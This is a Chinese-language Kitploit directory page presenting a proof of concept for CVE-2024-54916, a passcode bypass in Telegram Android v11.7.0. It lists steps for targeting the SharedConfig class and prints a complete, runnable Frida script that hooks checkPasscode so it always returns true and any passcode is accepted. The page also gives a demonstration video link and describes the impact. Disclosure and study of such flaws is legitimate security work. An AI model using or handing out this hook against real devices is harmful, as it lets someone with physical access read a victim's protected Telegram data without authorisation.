Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-54916 — 基于 Frida 的概念验证,通过挂钩 SharedConfig.checkPasscode 使其始终返回 true,演示 Telegram Android 中的认证绕过,实现未经授权的访问。 | Kitploit
工具/GitHubGitHub/sahalll/cve-2024-54916
Android安全动态分析 (沙盒)漏洞分析漏洞利用移动安全二进制分析身份验证
GitHubsahalll/cve-2024-54916

CVE-2024-54916

基于 Frida 的概念验证,通过挂钩 SharedConfig.checkPasscode 使其始终返回 true,演示 Telegram Android 中的认证绕过,实现未经授权的访问。

查看仓库
51年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-54916:Telegram apk中的认证绕过漏洞

Telegram Android APK v.11.7.0 的 SharedConfig 类中存在一个问题,允许物理邻近的攻击者通过操控 checkPasscode 方法的返回值来绕过认证并提升权限。

漏洞类型

认证绕过

供应商产品

Telegram

受影响产品代码库

Telegram android apk v.11.7.0

受影响组件

org.telegram.messenger.SharedConfig

利用

标识目标类和方法:

  • 应用程序中的 SharedConfig 类管理密码验证逻辑。
  • 该类中的 checkPasscode 方法负责判断输入的密码是否正确。

使用 Frida 挂钩该方法

  • 使用 Frida 脚本挂钩 SharedConfig 类中的 checkPasscode 方法。该方法被修改为始终返回 true,从而绕过实际的密码验证。

执行

  • 在应用运行时(动态)执行 Frida 脚本。用户输入的任何密码都将被视为有效,从而允许未经授权的访问。

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

视频 POC 链接:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

影响:-

此漏洞为客户端认证绕过问题。影响依赖密码功能保护敏感数据或限制特定应用功能访问的用户。通过利用此缺陷,物理邻近的攻击者可以操控密码验证过程,绕过认证并获取应用受保护区域的未授权访问。这可能导致敏感用户数据泄露或应用内未授权操作。

下载工具